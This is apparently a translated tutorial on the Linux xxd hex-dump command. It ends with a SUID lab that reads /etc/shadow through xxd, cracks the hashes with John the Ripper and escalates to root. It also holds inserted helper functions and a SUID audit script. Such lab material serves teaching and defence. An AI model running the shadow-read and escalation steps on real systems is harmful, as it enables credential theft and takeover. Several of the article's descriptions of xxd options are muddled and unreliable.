
Which Linux command can be used for privilege escalation?

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article introduces a Linux command that can be used for privilege escalation, which has a certain reference value. Interested readers can refer to it. I hope you will gain a lot after reading this article. Let's take a look at it.

xxd introduction

We know that if we want to convert a file to another format, we can use online conversion tools that handle almost any file format we need, such as "pdf to word, jpg to pdf, excel to pdf" and so on. But what if someone wants to convert an arbitrary file to hexadecimal or binary form?

This is very simple: on Linux we can use the xxd command. xxd produces a hexadecimal dump of a given file or of standard input, and it can also convert a hexadecimal dump back to the original binary form. This makes it useful for encoding and decoding arbitrary files.

First, let's use the help/man command to see how the xxd command is used.

xxd -h

The main actions performed using xxd

Convert the contents of the file to hexadecimal: for example, I created a new file called "secret.txt", and now I want to convert its contents to hexadecimal form, which I can do by typing the following command:

Syntax: xxd filename

xxd secret.txt

As shown in the following figure, it is clear that xxd has generated a hexadecimal dump for the file "secret.txt".

Here we can observe that the hexadecimal dump uses its default format:

An index number at the start of each line

The default number of octets for each group is 2, and the group size is 4 bytes.

The standard column length is 16 bits, including spaces

Skip line n using xxd: when converting files, there is a lot of data that we may not need, so we can skip it. We can use xxd to skip to the nth line and generate hexadecimal values only for what follows the skipped lines.

Assuming that in my current case I want to generate a hexadecimal dump from line 5, I can do this by using the "-s" parameter with the xxd command.

xxd -s 0x50 secret.txt

Limit the output to a specific length: I have explained above how to retrieve data by skipping a number of lines. However, if you want to limit the length of the output, you can use the "-l" parameter.

Here, I limit the printed data to a fixed range ending at line 5, as shown in the following figure.

xxd -l 0x50 secret.txt

Therefore, we can observe the difference between the two commands: the first command generates hexadecimal values starting from line 6, and the second command ends with line 5 based on the hexadecimal index. Please refer to the screenshot above.

Convert the contents of the file to binary: if you want to convert the file to binary form, you can use the "-b" option. The command is as follows:

xxd -b secret.txt

Set the column length: above I have shown how to skip and limit the output to the range, but we can also set the column length. By default, it is 12, 16 for any dump file.

Default value: we know that the default column length is 16. This will print 16 characters, including spaces.

xxd -l 0x20 secret.txt

Set the column length to 32: I used the "-l" option to set the end index to limit the range of printed data. Then I set the length of the column to 32 using the "-c" parameter.

xxd -l 0x40 -c 32 secret.txt

From the following figure, we can see how xxd limits the column length.

Set the column length to 9: now we set the column length to "9".

xxd -l 0x40 -c 9 secret.txt

In all of these cases, xxd creates a hexadecimal dump for the file by counting each character with a space.

Pure hexadecimal dump: we can use the "-ps" option to output a continuous hexadecimal dump in postscript style. Here we save its output in a file named hex to get a pure hexadecimal dump of the secret.txt file. To verify the results, we use the cat command to read the output from the hex file.

xxd -ps secret.txt > hex

cat hex

From the following figure, we can see how xxd creates a pure hexadecimal dump for the "secret.txt" file.

Restore files: we can use the "-r" option to restore the contents of the converted files. In our example, I used "-r -p" to print the reverse of a pure hexadecimal dump in ASCII format.

xxd -r -p hex

Group size in bytes: if we need to group the output into multiple octets, we can use the "-g" option to do so. It is 2 by default. Therefore, if we set the value to 4, it will be grouped into 8 bits.

In the following figure, we set the value to 8, which groups 16 bits as output to simplify the result.

xxd -l 0x30 -g 8 secret.txt
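The following shell functions are an added example, not part of the original article. They show that "-s" and "-l" count bytes (0x50 is 80 bytes, which is 5 lines only at the default 16 bytes per line) and that a "-p" dump restored with "-r -p" is byte-identical to the input. The function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the article). Function names are hypothetical.

# Print LEN bytes of FILE starting at byte OFFSET as one plain hex string.
# -s and -l accept decimal or 0x-prefixed hex and always count BYTES.
xxd_range() {
    xxd -p -s "$2" -l "$3" "$1" | tr -d '\n'
}

# Number of dump lines xxd prints for the first LEN bytes at COLS per line.
# Shows why 0x50 bytes equals "5 lines" only when -c is the default 16.
xxd_lines() {
    xxd -l "$2" -c "$3" "$1" | wc -l | tr -d ' '
}

# Return 0 if hex-encoding FILE with -p and decoding with -r -p
# reproduces the file byte for byte.
xxd_roundtrip_ok() {
    tmp=$(mktemp) || return 2
    xxd -p "$1" | xxd -r -p > "$tmp"
    if cmp -s "$1" "$tmp"; then rc=0; else rc=1; fi
    rm -f "$tmp"
    return "$rc"
}

# Stand-alone use: sh this_file FILE OFFSET LEN
if [ "$#" -eq 3 ]; then
    xxd_range "$1" "$2" "$3"
    echo
fi
```

For a file of 64 bytes or more, `xxd_lines FILE 0x40 9` returns 8, because 64 bytes at 9 bytes per line need seven full lines plus one partial line.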

SUID Lab Setting

SUID special permissions run the command with the owner's privileges, not with the executor's privileges. Now, let's enable SUID permissions on xxd so that local users have the opportunity to take advantage of xxd to gain root permissions.

Enable the SUID bit by typing the following command:

which xxd

chmod u+s /usr/bin/xxd

ls -al /usr/bin/xxd

SUID exploitation

Now, we will exploit xxd with the SUID special permission bit set. To do this, I created a session on the victim machine, which gives us local user access to the target system.

Let's use ssh to connect to the target machine with the following command:

ssh test@192.168.1.103

After successfully accessing the victim's machine, we use the find command to find binaries with SUID permissions.

find / -perm -u=s -type f 2>/dev/null

Here we can see that there are many binaries with the SUID bit set, but we focus on /usr/bin/xxd.

With the SUID bit set on xxd, we can read the shadow file and extract the password hashes from it.

As shown in the figure below, I read the /etc/shadow file by using xxd, which generates a hexadecimal dump of the file, and piped that into a second xxd command to restore the original output.

xxd "/etc/shadow" | xxd -r

Now, I will use the tool John the Ripper to crack the password hash. In this way, we can get the user credentials, as shown in the following figure.

john hash

After obtaining the credentials, we can switch users. First, let's check the sudo permissions of the user raj; we find that the user "raj" has all permissions.

su raj

sudo -l

sudo su

So let's switch directly to the root user account and access a root shell. So far, we have successfully escalated our user privileges by using the xxd command.
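From the defender's side, the same find test used above can drive an audit that reports setuid files that are not on a known-good baseline, which is how a SUID bit on /usr/bin/xxd would be caught. This is an added example, not part of the original article; the function name and the contents of DEFAULT_ALLOW are assumptions and should be replaced with a baseline taken from a clean install of your distribution.

```shell
#!/bin/sh
# Added example (not from the article): list setuid files under a directory
# that are missing from an allowlist. DEFAULT_ALLOW is an ASSUMED baseline,
# one absolute path per line; derive the real one from a clean install.
DEFAULT_ALLOW='/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount'

# suid_audit ROOT ALLOWLIST
# Prints one path per line for every regular file under ROOT that has the
# setuid bit (mode 4000) and is not an exact match for an ALLOWLIST line.
suid_audit() {
    # -xdev stays on one filesystem; errors from unreadable dirs are dropped
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        # -F fixed string, -x whole line: no regex or prefix surprises
        printf '%s\n' "$2" | grep -Fxq -- "$path" || printf '%s\n' "$path"
    done
}

# Stand-alone use: sh this_file /usr/bin
# A general-purpose file reader such as xxd appearing in the output should
# have the bit removed again with: chmod u-s /usr/bin/xxd
if [ "$#" -gt 0 ]; then
    suid_audit "$1" "$DEFAULT_ALLOW"
fi
```

Running the audit on a schedule and comparing its output with the previous run turns a newly added setuid bit into an alert instead of a finding during incident response.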
